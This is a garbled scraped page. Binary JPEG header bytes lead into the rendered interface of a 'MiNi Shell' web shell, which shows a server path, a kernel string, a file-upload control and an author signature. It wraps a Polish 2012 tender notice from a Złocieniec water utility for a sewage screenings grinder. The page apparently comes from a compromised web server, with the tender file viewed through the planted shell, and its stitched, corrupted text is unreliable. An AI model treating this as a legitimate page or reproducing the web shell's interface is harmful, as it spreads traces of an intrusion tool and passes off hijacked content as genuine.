JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120928/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120928/371954-N-2012.html

<p class="kh_header"><b>Złocieniec: DOSTAWA I MONTAŻ KANAŁOWEJ ROZDRABNIARKI SKRATEK Z UKŁADEM NAPĘDOWYM I SZAFKĄ STEROWNICZĄ</b><br>
<b>Numer ogłoszenia: 371954 - 2012; data zamieszczenia: 28.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Wodociągów i Kanalizacji Spółka z o. o. , ul. Piaskowa 6, 78-520 Złocieniec, woj. zachodniopomorskie, tel. 94 3671659, faks 94 3670024.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zwik.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Zakład Wodociągów i Kanalizacji Sp. z o.o. w Złocieńcu.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA I MONTAŻ KANAŁOWEJ ROZDRABNIARKI SKRATEK Z UKŁADEM NAPĘDOWYM I SZAFKĄ STEROWNICZĄ.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest: dostawa i montaż 1 kompletu kanałowej rozdrabniarki skratek z układem napędowym i panelem - szafką sterowniczą. 
2.	Opis warunków pracy i miejsca instalacji rozdrabniarki skratek;
a)	medium - ścieki surowe przesyłane kanalizacją ogólnospławną,
b)	maksymalny przepływ ścieków przez rozdrabniarkę - do 420 m3/h,
c)	miejsce instalacji urządzenia - istniejąca studnia rewizyjna przed wlotem do budynku krat - schemat zawierający wymiary studni ujęto w załączniku 6a i 6b do SIWZ. Na stronie internetowej Zamawiającego www.zwik.pl zamieszczono zdjęcia obiektu przewidzianego dla realizacji zamówienia.
d)	odległość studni przelewowej od komory krat - 50 metrów,
3.	Elementy składowe przedmiotu zamówienia:
a)	rozdrabniarka dwuwałowa z dyskami/ nożami/ frezami/ tnącymi, rozdrabniającymi części stałe do wielkości około 6 mm,
b)	napęd - silnik zatapialny o mocy do  4 kW, wykonany w wersji z ATEX, z reduktorem obrotów,
c)	rama rozdrabniarki - przystosowana do montażu w studni z kinetą, wykonana ze stali nierdzewnej lub kwasoodpornej,
d)	panel sterowania - automatyka sterownia musi zawierać: 1) program tzw. samooczyszczania; 2) system zapobiegania przed przeciążeniem jednostki napędowej - silnika; 3) sygnalizację świetlną lub dźwiękową blokady pracy urządzenia,
e)	urządzenie przelewowe - niezbędne dla przepływów chwilowych lub burzowych większych niż 420 m3/h,
f)	metalowa lub kompozytowa kopuła nakrywająca otwór studzienny o przekroju 1400 mm, mocowana na zawiasach.
4.	Układ automatyki i sterowania rozdrabniarki: 
a)	musi posiadać wbudowany w układ automatyki i sterowania program samooczyszczenia oraz system zapobiegania przed przeciążeniem silników i uszkodzeniem urządzeń.
b)	musi  być przystosowany do podłączenia do systemu wizualizacji i zdalnego sterowania TelWin SCADA, który posiada Zamawiający.  W tym celu w szafie sterującej układu automatyki i sterowania rozdrabniarki muszą być wyprowadzone wraz z opisem lub dokumentacją wszystkie sygnały (wejściowe i wyjściowe) dwustanowe i analogowe, które można będzie podłączyć do sterownika PLC pracującego w systemie wizualizacji i zdalnego sterowania.
Wśród sygnałów dwustanowych muszą być co najmniej następujące sygnały:
-	AWARIA
-	PRACA ROZDRABNIARKI
Wśród sygnałów analogowych muszą być co najmniej następujące sygnały:
-	POMIAR PRĄDU SILNIKA
-	 CZAS PRACY ROZDRABNIARKI
 Zastosowane urządzenia pomiarowe powinny spełniać następujące wymogi:
-	gwarantować wysoką jakość pomiarów,
-	posiadać układy samokontroli,
-	wypracować sygnały analogowe w standardzie 4-20 mA lub komunikować się w protokole komunikacyjnym np. Profibus, MODBUS RTU, posiadać galwanicznie izolowane we/wy,
-	sygnały dwustanowe muszą być wyprowadzone w postaci bezpotencjałowych styków np. przekaźników; 
-	napięcie zasilające 24V DC. 
c)	w przypadku zastosowania sterowników PLC lub paneli graficznych wykonawca musi udostępnić specyfikację protokołu transmisji. Po uruchomieniu rozdrabniarki Wykonawca przeszkoli nadzór i obsługę obiektu oraz przekaże zamawiającemu programy narzędziowe (w tym nazwę i wersję środowiska, licencję, klucze sprzętowe, itp), aplikację, kody źródłowe (w postaci elektronicznej), wynikowe (w postaci elektronicznej) i wszystkie hasła niezbędne do zaprogramowania sterownika i paneli graficznych.  W formie pisemnej wykonawca przekaże  wszelkie prawa majątkowe do wykonanego w ramach tego zadania  oprogramowania.
5.	Montaż urządzenia:
a)	ustawienie i uruchomienie zastępczej pompowni elektrycznej o wydajności zbliżonej do przepływów maksymalnych podanych w pkt 2b wraz z przewodem tłocznym celem przepompowywania dopływających ścieków w czasie montażu rozdrabniarki, na odległość około 50 metrów tj. odległość od studni przelewowej do komory krat,
b)	zamknięcie kolektora dopływowego o średnicy fi-600 mm korkiem pneumatycznym,
c)	równanie dna studni - przygotowanie dna studni do montażu urządzenia,
d)	montaż ramy rozdrabniarki w studni,
e)	montaż rozdrabniarki w ramie,
f)	montaż szafki sterowniczej na zewnętrznej ścianie budynku krat,
g)	wykonanie podłączenia zasilania rozdrabniarki do szafy sterowniczej,
h)	uruchomienie i przeszkolenie pracowników obsługi oczyszczalni ścieków,
6.	Zamawiający umożliwi każdemu z wykonawców przeprowadzenie wizji lokalnej obiektu i miejsca przeznaczonego do instalacji rozdrabniarki skratek.
7.	Gwarancja na dostarczone urządzenia - minimum 12 miesięcy.
8.	Wykonawca na koszt własny dostarczy przedmiot zamówienia do miejsca wskazanego przez Zamawiającego.
9.	Dostarczone urządzenia muszą posiadać certyfikaty bezpieczeństwa Unii Europejskiej.
10.	Zamawiający wymaga złożenie wraz z ofertą wypełnioną kalkulację cenową oraz dokumentację opisującą typ i charakterystykę pracy urządzenia - tabele, wykresy, karty katalogowe, dokumentację techniczno-ruchową.
11.	Zamawiający wymaga aby wszystkie pozycje w kalkulacji cenowej były wycenione (np.: elementy urządzenia rozdrabniającego, montaż, pompowanie ścieków, szkolenie itp.)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 42.99.61.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 70.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy nie podlegają
    wykluczeniu z postępowania na podstawie art. 22 ust. 1 i 2 ustawy Pzp oraz
    spełniają warunki udziału w postępowaniu dotyczące:
  a.	posiadania uprawnień do wykonywania określonej działalności lub czynności,
        jeżeli przepisy prawa nakładają obowiązek ich posiadania. 
        -Opis sposobu dokonywania oceny spełniania tego warunku: nie określa się.
  b.	posiadania wiedzy i doświadczenia:
        -Opis sposobu dokonywania oceny spełniania tego warunku: o udzielenia 
        zamówienia mogą ubiegać się wykonawcy, którzy w okresie ostatnich trzech lat
        przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności
        jest krótszy w tym okresie wykonali dwie dostawy z montażem urządzeń 
        podobnych do przedmiotu zamówienia. Ocena spełniania tego warunku będzie 
        dokonana na podstawie złożonego  wykazu wykonanych dostaw z montażem i 
        dokumentów potwierdzających, że dostawa i montaż został wykonany
       prawidłowo na zasadzie spełnia/nie spełnia.
  c. dysponowania odpowiednim potencjałem technicznym.
      -Opis sposobu dokonywania oceny spełniania tego warunku: nie określa się.
  d.  dysponowania osobami zdolnymi do wykonania zamówienia.
      -Opis sposobu dokonania oceny spełniania tego warunku: nie określa się.
  e. sytuacji ekonomicznej i finansowej.
      -Opis sposobu dokonania oceny spełniania tego warunku: nie określa się.
  f. brak podstaw do wykluczenia w rozumieniu art 24 ust. 1 ustawy Pzp.
      Ocena braku podstaw do wykluczenia z postępowania zostanie dokonana na
      podstawie załączonego przez wykonawcę do oferty oświadczenia o braku 
      podstaw do wykluczenia na podstawie art. 24 ust. 1 ustawy Pzp oraz
      dokumentów potwierdzających brak wykluczenia wskazanych w SIWZ, na 
      zasadzie spełnia /nie spełnia.
2. Za spełnienie warunków określonych w podpunkcie 1 od a do f Zamawiający
    uzna jeżeli Wykonawca:
  a.	Przedłoży oświadczenie Wykonawcy o spełnieniu warunków udziału w 
        postępowaniu o zamówienie publiczne zgodnie z art. 22 ust. 1 ustawy.
  b.	Złoży wraz z ofertą dokumenty i oświadczenia wskazane w części VI i VII
        SIWZ.   
3. Jeżeli wykonawca wykazując spełnienie warunku, o których mowa w punkcie 
    1 polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust 2b
       ustawy Pzp, Wykonawca zobowiązany jest udowodnić Zamawiającemu, iż
       będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w
       szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów
       do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich
       przy wykonywaniu zamówienia.
3. Ocena w/w warunków dokonana zostanie zgodnie z formułą spełnia/nie
        spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach
        dołączonych do oferty.  Z treści załączonych dokumentów musi wynikać
        jednoznacznie, że w/w warunki Wyko-nawca spełnił. W przypadku wątpliwości 
        co do treści oświadczeń i dokumentów złożonych przez Wykonawcę na
        potwierdzenie spełnienia warunków udziału w postępowaniu, Zamawiający 
        wzywa Wykonawcę w określonym przez siebie terminie do złożenia wyjaśnień. 
5. Zamawiający, zgodnie z art. 89 ust.1 ustawy Prawo zamówień publicznych odrzuci
    ofertę, jeżeli:
  a.	jest niezgodna z ustawą,
  b.	jej treść nie odpowiada treści specyfikacji istotnych warunków zamówienia,
        zastrzeżeniem art. 87 ust. 2 pkt 3 ustawy Pzp,
  c.	jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów
         o zwalczaniu nieuczciwej konkurencji,
  d.	zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia, 
  e.	została złożona przez wykonawcę wykluczonego z udziału w postępowaniu
        o udzielenie zamówienia  lub nie zaproszonego do składania ofert,
  f.	zawiera błędy w obliczeniu ceny,
  g.	wykonawca w terminie 3 dni od dnia otrzymania zawiadomienia nie zgodził się
        na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3 ustawy Pzp.,
h.	jest nieważna na podstawie odrębnych przepisów.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania tego warunku: o udzielenia zamówienia mogą ubiegać się wykonawcy, którzy w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie wykonali dwie dostawy z montażem urządzeń podobnych do przedmiotu zamówienia. Ocena spełniania tego warunku będzie dokonana na podstawie złożonego  wykazu wykonanych dostaw z montażem i dokumentów potwierdzających, że dostawa i montaż został wykonany prawidłowo na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">opis urządzeń technicznych, instrukcję obsługi oraz środków stosowanych przez wykonawcę dostaw lub usług oraz opis zaplecza naukowo-badawczego wykonawcy, w celu potwierdzenia zapewnienia odpowiedniej jakości realizowanego zamówienia</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo do podpisania oferty w przypadku osoby, która nie jest wymieniona  w odpisie z właściwego rejestru lub do podpisania oferty w przypadku podmiotów występujących wspólnie.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1)	Zakres zmian umowy dopuszczalnych przez zamawiającego po uprzednim uzyskaniu jego zgody, w przypadku:
a)	działania siły wyższej,  
b)	przeszkód lub warunków, które mogą mieć wpływ na realizacje dostaw, a które
         nie mogły być racjonalnie przewidziane przez kompetentnego wykonawcę lub
         zamawiającego,
c)	możliwa jest zmiana terminu realizacji zamówienia uwzględniająca jednak
         wydatkowanie środków zabezpieczonych na realizację zadania w bieżącym roku
         budżetowym oraz zapewniająca terminową realizację projektu (zadania),
d)	w zakresie rodzaju/modelu sprzętu w przypadku obiektywnej niemożności dostar-czenia sprzętu (zakończona produkcja, niedostępność na rynku, etc.) umowę można zmienić co do rodzaju/typu/modelu sprzętu, pod warunkiem, że urządze-nie/urządzenia będą nowszą wersją oferowanego modelu, będą miały lepsze wszystkie parametry, bądź część parametrów i pozostałe parametry bez zmian,
e)	szczególnie uzasadniane zmiany rozwiązań konstrukcyjnych w stosunku do kon-cepcji przedstawionej w ofercie ze szczególnym uwzględnieniem zmian korzystnych dla zamawiającego, 
f)	uzasadniona zmiana terminu określonego w umowie i siwz nie wpływająca jednak na sprawną i terminową realizację całości umowy.

2)	Zmiana umowy możliwa jest także w następujących przypadkach:
a)	zaistnienia omyłki pisarskiej,
b)	nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację zamówienia,
c)	przypadku powstania niejasności lub rozbieżności w rozumieniu pojęć użytych w umowie, których nie będzie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jej jednoznacznej interpretacji.

3)	Zmiany umowy określone powyżej nie będą skutkować zmianą ceny umowy, ani naliczeniem kar umownych, bądź odsetek ustawowych za zwłokę dla którejkolwiek ze stron umowy. 
4)	Wszelkie zmiany w treści umowy muszą być zachowane w formie pisemnej pod rygorem ich nieważności</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zwik.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ZWiK Sp. z o.o., ul. Piaskowa 6, 78-520 Złocieniec..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.10.2012 godzina 10:00, miejsce: ZWiK Sp. z o.o., ul. Piaskowa 6, 78-520 Złocieniec, pokój nr 13 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com